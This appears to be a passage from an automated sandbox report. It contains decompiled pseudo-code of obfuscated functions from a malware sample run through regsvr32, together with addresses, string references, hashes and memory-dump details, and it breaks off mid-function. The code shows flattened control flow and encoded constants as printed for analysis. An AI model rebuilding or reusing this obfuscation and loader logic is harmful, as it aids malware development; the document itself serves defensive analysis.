0x040e2628
0x00000000
0x040e2628
0x040e2628
0x040e2643
0x040e27b7
0x040e27c4
0x040e27d7
0x040e27e4
0x040e27ef
0x040e27f8
0x040e27f8
0x040e264f
0x040e27a6
0x00000000
0x040e27ac
0x040e2657
0x00000000
0x00000000
0x040e2661
0x040e267b
0x040e2682
0x040e2687
0x040e268e
0x040e269a
0x040e2690
0x040e2692
0x040e2697
0x040e2697
0x00000000
0x040e2785
0x040e2785
0x040e2785
0x00000000
0x040e2791

Strings

)^^, xrefs: 040E221B
b, xrefs: 040E23AA
J;, xrefs: 040E22DF
:*, xrefs: 040E23D3
f, xrefs: 040E2160

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )^^$:*$J;$b$f
API String ID: 0-204930537
Opcode ID: 1fda6b3e01e66bfe1f527ebe6446304809303491e231eec52a8d0d48ddb3b167
Instruction ID: c458d39ed7535cd1c1fcca844148e7f18691feb2d73b522e9e759a1626131a54
Opcode Fuzzy Hash: 1fda6b3e01e66bfe1f527ebe6446304809303491e231eec52a8d0d48ddb3b167
Instruction Fuzzy Hash: 7AF120B16083808FD3A8CF65D48AA4BFBF1FBC4718F108A1DF19996260D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040F2009, Relevance: 6.5, Strings: 5, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040F2009() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t333;
				intOrPtr _t340;
				void* _t364;
				signed int* _t368;

				_t368 =  &_v1184;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0x35c0cd;
				_v1048 = 0xa3be33;
				_v1136 = 0x5ade05;
				_v1136 = _v1136 + 0xffffc499;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0x000b842c;
				_v1180 = 0x412a9d;
				_t326 = 0x29;
				_v1180 = _v1180 / _t326;
				_v1180 = _v1180 << 0xb;
				_t364 = 0xe958b9c;
				_v1180 = _v1180 + 0xffff9519;
				_v1180 = _v1180 ^ 0x0cbc23a5;
				_v1156 = 0xd33cfc;
				_v1156 = _v1156 + 0xffff4a87;
				_v1156 = _v1156 ^ 0xbe5aeb75;
				_t327 = 0xb;
				_v1156 = _v1156 * 0x62;
				_v1156 = _v1156 ^ 0xf0302705;
				_v1148 = 0xf18826;
				_v1148 = _v1148 << 1;
				_v1148 = _v1148 >> 0xa;
				_v1148 = _v1148 + 0xffff44eb;
				_v1148 = _v1148 ^ 0xfffe3e21;
				_v1112 = 0x4e0c4f;
				_v1112 = _v1112 + 0x7be6;
				_v1112 = _v1112 ^ 0x004f5571;
				_v1128 = 0xa7ca39;
				_v1128 = _v1128 + 0xffffebca;
				_v1128 = _v1128 / _t327;
				_v1128 = _v1128 ^ 0x000be641;
				_v1176 = 0xb5e613;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 >> 3;
				_v1176 = _v1176 ^ 0x109d8d71;
				_v1100 = 0x8f570;
				_v1100 = _v1100 << 6;
				_v1100 = _v1100 ^ 0x02300751;
				_v1184 = 0x7a4582;
				_v1184 = _v1184 >> 0xc;
				_v1184 = _v1184 + 0xffff757f;
				_v1184 = _v1184 + 0xcda4;
				_v1184 = _v1184 ^ 0x0000a546;
				_v1140 = 0x8d05f4;
				_v1140 = _v1140 * 3;
				_v1140 = _v1140 | 0x54c49d95;
				_v1140 = _v1140 + 0xffffe0ec;
				_v1140 = _v1140 ^ 0x55e75198;
				_v1108 = 0xd76cc6;
				_v1108 = _v1108 | 0x05cc2328;
				_v1108 = _v1108 ^ 0x05dcca41;
				_v1076 = 0x1bbfa4;
				_v1076 = _v1076 * 0x15;
				_v1076 = _v1076 ^ 0x02435ecc;
				_v1084 = 0x2803a8;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 ^ 0x007964fc;
				_v1092 = 0x1abb48;
				_v1092 = _v1092 ^ 0xd0321100;
				_v1092 = _v1092 ^ 0xd024152f;
				_v1120 = 0x1b785b;
				_v1120 = _v1120 + 0x6594;
				_v1120 = _v1120 ^ 0xc9bc1812;
				_v1120 = _v1120 ^ 0xc9a1a482;
				_v1056 = 0xf96b0d;
				_v1056 = _v1056 | 0x7a81934f;
				_v1056 = _v1056 ^ 0x7af06d17;
				_v1116 = 0xc0176d;
				_t328 = 0x57;
				_v1116 = _v1116 / _t328;
				_v1116 = _v1116 ^ 0x000c7a92;
				_v1144 = 0x386a20;
				_v1144 = _v1144 >> 0xa;
				_t329 = 0x41;
				_v1144 = _v1144 * 0x35;
				_v1144 = _v1144 + 0xffff2f3c;
				_v1144 = _v1144 ^ 0x00015cc7;
				_v1124 = 0xfe7131;
				_v1124 = _v1124 >> 4;
				_v1124 = _v1124 + 0xffffd592;
				_v1124 = _v1124 ^ 0x000ea5e3;
				_v1172 = 0xf233ef;
				_v1172 = _v1172 / _t329;
				_v1172 = _v1172 >> 8;
				_v1172 = _v1172 >> 7;
				_v1172 = _v1172 ^ 0x000dfea7;
				_v1088 = 0xf13b31;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0f1b90b2;
				_v1060 = 0x8432f0;
				_v1060 = _v1060 + 0xf898;
				_v1060 = _v1060 ^ 0x00806ced;
				_v1096 = 0x8a20ae;
				_v1096 = _v1096 + 0xffff5c91;
				_v1096 = _v1096 ^ 0x008c8276;
				_v1072 = 0xbc3343;
				_v1072 = _v1072 | 0xeb032685;
				_v1072 = _v1072 ^ 0xebbb8611;
				_v1104 = 0xb5445c;
				_v1104 = _v1104 | 0x38284c17;
				_v1104 = _v1104 ^ 0x38b8f1ba;
				_v1152 = 0x20ddec;
				_t330 = 0x69;
				_v1152 = _v1152 * 0x4d;
				_v1152 = _v1152 >> 1;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x15fd1151;
				_v1132 = 0xda9d4d;
				_v1132 = _v1132 / _t330;
				_v1132 = _v1132 ^ 0x63ba58ef;
				_v1132 = _v1132 ^ 0x63ba5da3;
				_v1080 = 0xcf1222;
				_v1080 = _v1080 | 0x484758e4;
				_v1080 = _v1080 ^ 0x48c184f1;
				_v1064 = 0x309461;
				_v1064 = _v1064 + 0xffffd409;
				_v1064 = _v1064 ^ 0x00392de5;
				_v1164 = 0xd882bd;
				_t331 = 0xc;
				_v1164 = _v1164 / _t331;
				_v1164 = _v1164 + 0x74b;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 ^ 0x00039f5a;
				_v1160 = 0x7a48e2;
				_v1160 = _v1160 ^ 0x69cb0a8d;
				_v1160 = _v1160 ^ 0x1624d419;
				_v1160 = _v1160 >> 9;
				_v1160 = _v1160 ^ 0x00301506;
				_v1168 = 0x1f51cb;
				_v1168 = _v1168 ^ 0x7c6813be;
				_v1168 = _v1168 * 0x65;
				_v1168 = _v1168 + 0xffff91bf;
				_v1168 = _v1168 ^ 0x1b097545;
				_v1068 = 0x9ab8d;
				_v1068 = _v1068 + 0x88f0;
				_v1068 = _v1068 ^ 0x000186e4;
				E040D556B(_t331);
				do {
					while(_t364 != 0x62623fc) {
						if(_t364 == 0x81770e6) {
							return E040E654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
						}
						if(_t364 == 0xe065299) {
							_push(_v1124);
							_push(_v1144);
							_push(_v1116);
							_t319 = E040EE1F8(0x40d1080, _v1056, __eflags);
							_t320 = E040DDC1B(_v1172);
							_t340 =  *0x40f6214; // 0x0
							_t321 =  *0x40f6214; // 0x0
							E040F44AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
							_t315 = E040EFECB(_t319, _v1132, _v1080, _v1064, _v1164);
							_t368 =  &(_t368[0xf]);
							_t364 = 0x81770e6;
							continue;
						}
						if(_t364 != 0xe958b9c) {
							goto L8;
						}
						_t364 = 0x62623fc;
					}
					_push(_v1128);
					_push(_v1112);
					_push(_v1148);
					_t310 = E040EE1F8(0x40d1000, _v1156, __eflags);
					_t333 =  *0x40f6214; // 0x0
					_t312 =  *0x40f6214; // 0x0
					__eflags = _t312 + 0x23c;
					E040F2D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
					_t315 = E040EFECB(_t310, _v1076, _v1084, _v1092, _v1120);
					_t368 =  &(_t368[0xe]);
					_t364 = 0xe065299;
					L8:
					__eflags = _t364 - 0xc2e12c9;
				} while (__eflags != 0);
				return _t315;
			}

0x040f2009
0x040f200f
0x040f2019
0x040f2024
0x040f202f
0x040f2037
0x040f203f
0x040f2044
0x040f204c
0x040f205e
0x040f2063
0x040f2069
0x040f206e
0x040f2073
0x040f207b
0x040f2083
0x040f208b
0x040f2093
0x040f20a0
0x040f20a1
0x040f20a5
0x040f20ad
0x040f20b5
0x040f20b9
0x040f20be
0x040f20c6
0x040f20ce
0x040f20d6
0x040f20de
0x040f20e6
0x040f20ee
0x040f20fc
0x040f2100
0x040f2108
0x040f2110
0x040f2115
0x040f211a
0x040f211f
0x040f2127
0x040f212f
0x040f2134
0x040f213c
0x040f2144
0x040f2149
0x040f2151
0x040f2159
0x040f2161
0x040f216e
0x040f2172
0x040f217a
0x040f2182
0x040f218a
0x040f2192
0x040f219a
0x040f21a2
0x040f21af
0x040f21b3
0x040f21bb
0x040f21c3
0x040f21c8
0x040f21d0
0x040f21d8
0x040f21e0
0x040f21e8
0x040f21f0
0x040f21f8
0x040f2200
0x040f2208
0x040f2215
0x040f2220
0x040f222b
0x040f2239
0x040f223e
0x040f2244
0x040f224c
0x040f2254
0x040f225e
0x040f2261
0x040f2265
0x040f226d
0x040f2275
0x040f227d
0x040f2282
0x040f228a
0x040f2292
0x040f22a2
0x040f22a6
0x040f22ab
0x040f22b0
0x040f22b8
0x040f22c0
0x040f22c5
0x040f22cd
0x040f22d8
0x040f22e3
0x040f22ee
0x040f22f6
0x040f22fe
0x040f2306
0x040f2311
0x040f231c
0x040f2327
0x040f232f
0x040f2337
0x040f233f
0x040f234c
0x040f234f
0x040f2353
0x040f2357
0x040f235c
0x040f2364
0x040f2374
0x040f2378
0x040f2380
0x040f2388
0x040f2390
0x040f2398
0x040f23a0
0x040f23ab
0x040f23b6
0x040f23c1
0x040f23cd
0x040f23d0
0x040f23d4
0x040f23dc
0x040f23e1
0x040f23e9
0x040f23f1
0x040f23f9
0x040f2401
0x040f2406
0x040f240e
0x040f2416
0x040f2423
0x040f2427
0x040f242f
0x040f2437
0x040f2442
0x040f244d
0x040f2460
0x040f2474
0x040f2474
0x040f247e
0x00000000
0x040f25e3
0x040f2486
0x040f2498
0x040f24a1
0x040f24a5
0x040f24b0
0x040f24bb
0x040f24c7
0x040f24de
0x040f2506
0x040f2523
0x040f2528
0x040f252b
0x00000000
0x040f252b
0x040f248e
0x00000000
0x00000000
0x040f2494
0x040f2494
0x040f2532
0x040f253b
0x040f253f
0x040f2547
0x040f254c
0x040f2571
0x040f257d
0x040f2587
0x040f25a7
0x040f25ac
0x040f25af
0x040f25b1
0x040f25b1
0x040f25b1
0x00000000

Strings

-9, xrefs: 040F23B6
Hz, xrefs: 040F23E9
qUO, xrefs: 040F20DE
j8, xrefs: 040F224C
XGH, xrefs: 040F2390

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: j8$qUO$-9$Hz$XGH
API String ID: 0-60989354
Opcode ID: 06e8364bfbd0b3490d5a183fa176a60972e220801b6a1fced39a3a84ef1f013f
Instruction ID: 0fb4201bdfa5b8e8e3db33a1530d8608d8cca6fbf5cd2088405a7ab74c65141a
Opcode Fuzzy Hash: 06e8364bfbd0b3490d5a183fa176a60972e220801b6a1fced39a3a84ef1f013f
Instruction Fuzzy Hash: 9DE131715087809FC3A8CF65C989A4BBBF1FBC4748F508A1CF6E996260D7B59948CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040F3EE9, Relevance: 6.5, Strings: 5, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040F3EE9() {
				intOrPtr _t261;
				intOrPtr _t262;
				void* _t268;
				signed char _t274;
				intOrPtr _t277;
				signed int _t288;
				intOrPtr _t289;
				signed char _t296;
				signed int _t316;
				intOrPtr _t326;
				intOrPtr _t330;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				intOrPtr _t342;
				void* _t344;

				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
				_t288 = 0x4bd14f4;
				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
				 *(_t344 + 0x4c) = 0x48601c;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
				 *(_t344 + 8) = 0xdbf1f3;
				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
				_t333 = 0x4c;
				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
				 *(_t344 + 0x3c) = 0x6d1b19;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
				 *(_t344 + 0x18) = 0x1a2d0d;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
				_t334 = 9;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
				 *(_t344 + 0x5c) = 0xa7cc6c;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
				 *(_t344 + 0x38) = 0x67bd1;
				_t335 = 0x3d;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
				 *(_t344 + 0x28) = 0xde9e16;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
				_t336 = 6;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
				_t337 = 0x70;
				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
				 *(_t344 + 0x20) = 0xac092b;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
				 *(_t344 + 0x3c) = 0xd958f8;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
				 *(_t344 + 0x1c) = 0x265505;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
				 *(_t344 + 0x4c) = 0xea08b8;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
				 *(_t344 + 0x60) = 0x906ac9;
				_t338 = 0x13;
				_t330 =  *((intOrPtr*)(_t344 + 0x78));
				_t342 =  *((intOrPtr*)(_t344 + 0x78));
				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
				 *(_t344 + 0x48) = 0xe018a0;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
				 *(_t344 + 0x44) = 0xcf92eb;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
				 *(_t344 + 0x40) = 0xa30b5e;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
				 *(_t344 + 0x50) = 0x1f98d4;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
				 *(_t344 + 0x64) = 0x5b61ba;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
				 *(_t344 + 0x2c) = 0xb4bbf5;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
				 *(_t344 + 0x28) = 0x1351a7;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
				 *(_t344 + 0x70) = 0x74ba7c;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
				 *(_t344 + 0x30) = 0x6db52d;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
				 *(_t344 + 0x54) = 0x4f3eba;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
				while(1) {
					L1:
					_t316 =  *(_t344 + 0x68);
					while(1) {
						L2:
						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
						L3:
						while(_t288 != 0x42bf5b6) {
							if(_t288 == 0x434f657) {
								_push( *(_t344 + 0x1c));
								_push( *(_t344 + 0x40));
								_push( *(_t344 + 0x28));
								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
								_t268 = E040EE1F8(0x40d1758,  *(_t344 + 0x30), __eflags);
								_push( *(_t330 + 2) & 0x000000ff);
								E040DF96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
								_t223 = _t344 + 0x5c; // 0xa2772
								E040EFECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
								_t344 = _t344 + 0x40;
								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
								_t274 =  *((intOrPtr*)(_t330 + 6));
								_t296 =  *((intOrPtr*)(_t330 + 7));
								_t330 = _t330 + 8;
								_t288 = 0x42bf5b6;
								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
								goto L1;
							} else {
								if(_t288 == 0x4bd14f4) {
									_t326 =  *0x40f6228; // 0x0
									_t288 = 0x70ba79f;
									_t316 = _t326 + 0x14;
									 *(_t344 + 0x68) = _t316;
									goto L2;
								} else {
									if(_t288 == 0x70ba79f) {
										_t277 = E040E3D85( *(_t344 + 0x60), 0x40f6000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
										_t316 =  *(_t344 + 0x70);
										_t330 = _t277;
										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
										_t288 = 0xc4a3c33;
										continue;
									} else {
										if(_t288 == 0x9fd5b32) {
											__eflags = _t330 - _t261;
											asm("sbb ecx, ecx");
											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
											continue;
										} else {
											if(_t288 == 0xae47d7a) {
												E040F2B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
											} else {
												if(_t288 != 0xc4a3c33) {
													L17:
													__eflags = _t288 - 0xd28cf5a;
													if(__eflags != 0) {
														L2:
														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
														continue;
													}
												} else {
													_push(_t288);
													_push(_t288);
													_t342 = E040DC5D8(0x60);
													_t344 = _t344 + 0xc;
													if(_t342 != 0) {
														_t288 = 0x434f657;
														while(1) {
															L1:
															_t316 =  *(_t344 + 0x68);
															while(1) {
																L2:
																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							_t289 =  *0x40f6228; // 0x0
							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
							__eflags = 1;
							return 1;
						}
						_t262 =  *0x40f6228; // 0x0
						_t288 = 0x9fd5b32;
						 *_t316 = _t342;
						_t316 = _t342 + 0x18;
						 *(_t344 + 0x68) = _t316;
						_t235 = _t262 + 0x18;
						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
						__eflags =  *_t235;
						goto L17;
					}
				}
			}

0x040f3eec
0x040f3ef3
0x040f3ef8
0x040f3efd
0x040f3f05
0x040f3f0d
0x040f3f15
0x040f3f1d
0x040f3f2e
0x040f3f38
0x040f3f3d
0x040f3f43
0x040f3f48
0x040f3f50
0x040f3f58
0x040f3f60
0x040f3f65
0x040f3f6d
0x040f3f75
0x040f3f7e
0x040f3f83
0x040f3f89
0x040f3f91
0x040f3f99
0x040f3fa1
0x040f3fa6
0x040f3fae
0x040f3fba
0x040f3fbf
0x040f3fc5
0x040f3fca
0x040f3fd2
0x040f3fda
0x040f3fe6
0x040f3feb
0x040f3ff5
0x040f3ff8
0x040f3ffc
0x040f4004
0x040f400c
0x040f4014
0x040f401c
0x040f4024
0x040f402c
0x040f4034
0x040f403c
0x040f4041
0x040f4049
0x040f4051
0x040f4059
0x040f4061
0x040f4069
0x040f4071
0x040f4079
0x040f4086
0x040f408a
0x040f4094
0x040f40a3
0x040f40a4
0x040f40a8
0x040f40ac
0x040f40b0
0x040f40b8
0x040f40c0
0x040f40c5
0x040f40ca
0x040f40d2
0x040f40da
0x040f40e2
0x040f40ea
0x040f40f2
0x040f4100
0x040f4104
0x040f410c
0x040f4114
0x040f411c
0x040f4124
0x040f4129
0x040f4131
0x040f4139
0x040f4141
0x040f4149
0x040f4151
0x040f4159
0x040f415e
0x040f4166
0x040f416e
0x040f4176
0x040f417b
0x040f4188
0x040f418c
0x040f4194
0x040f419c
0x040f41a4
0x040f41ac
0x040f41b4
0x040f41b9
0x040f41c1
0x040f41c9
0x040f41d1
0x040f41d9
0x040f41e1
0x040f41e6
0x040f41ee
0x040f41ee
0x040f41ee
0x040f41f2
0x040f41f2
0x040f41f2
0x00000000
0x040f41f6
0x040f4208
0x040f42d3
0x040f42df
0x040f42e5
0x040f42f0
0x040f42f7
0x040f42fb
0x040f430a
0x040f4335
0x040f433a
0x040f4352
0x040f435b
0x040f4369
0x040f436d
0x040f4370
0x040f4373
0x040f437c
0x040f4388
0x00000000
0x040f420e
0x040f4214
0x040f42bc
0x040f42c2
0x040f42c7
0x040f42ca
0x00000000
0x040f421a
0x040f4220
0x040f4299
0x040f429e
0x040f42a2
0x040f42a5
0x040f42a9
0x040f42ae
0x040f42b2
0x00000000
0x040f4222
0x040f4228
0x040f4272
0x040f4274
0x040f427c
0x00000000
0x040f422a
0x040f4230
0x040f43c4
0x040f4236
0x040f423c
0x040f43a7
0x040f43a7
0x040f43ad
0x040f41f2
0x040f41f2
0x00000000
0x040f41f2
0x040f4242
0x040f4252
0x040f4253
0x040f425b
0x040f425d
0x040f4262
0x040f4268
0x040f41ee
0x040f41ee
0x040f41ee
0x040f41f2
0x040f41f2
0x040f41f2
0x00000000
0x040f41f2
0x040f41f2
0x040f41ee
0x040f4262
0x040f423c
0x040f4230
0x040f4228
0x040f4220
0x040f4214
0x040f43cb
0x040f43d7
0x040f43db
0x040f43e0
0x040f43e5
0x040f43e5
0x040f4391
0x040f4396
0x040f439b
0x040f439d
0x040f43a0
0x040f43a4
0x040f43a4
0x040f43a4
0x00000000
0x040f43a4
0x040f41f2

Strings

y%, xrefs: 040F4129
z}, xrefs: 040F422A
r', xrefs: 040F433A
q(, xrefs: 040F40E2
ldM', xrefs: 040F41E6

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ldM'$q($r'$y%$z}
API String ID: 0-1771948706
Opcode ID: f21241782361abeeb12e503b7f0c83c04dc18b79c82b0d7129ea35b1dfb4ba56
Instruction ID: 7308a3fb7441e45eb5db1515ff2b91f406c79dd4cf2fcf2fe12f4655626b8684
Opcode Fuzzy Hash: f21241782361abeeb12e503b7f0c83c04dc18b79c82b0d7129ea35b1dfb4ba56
Instruction Fuzzy Hash: EED150711083809FD368CF25C88955BBBF2FBD5358F148A1DF6A6A6220D3B5D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 040DFB8E, Relevance: 6.5, Strings: 5, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040DFB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
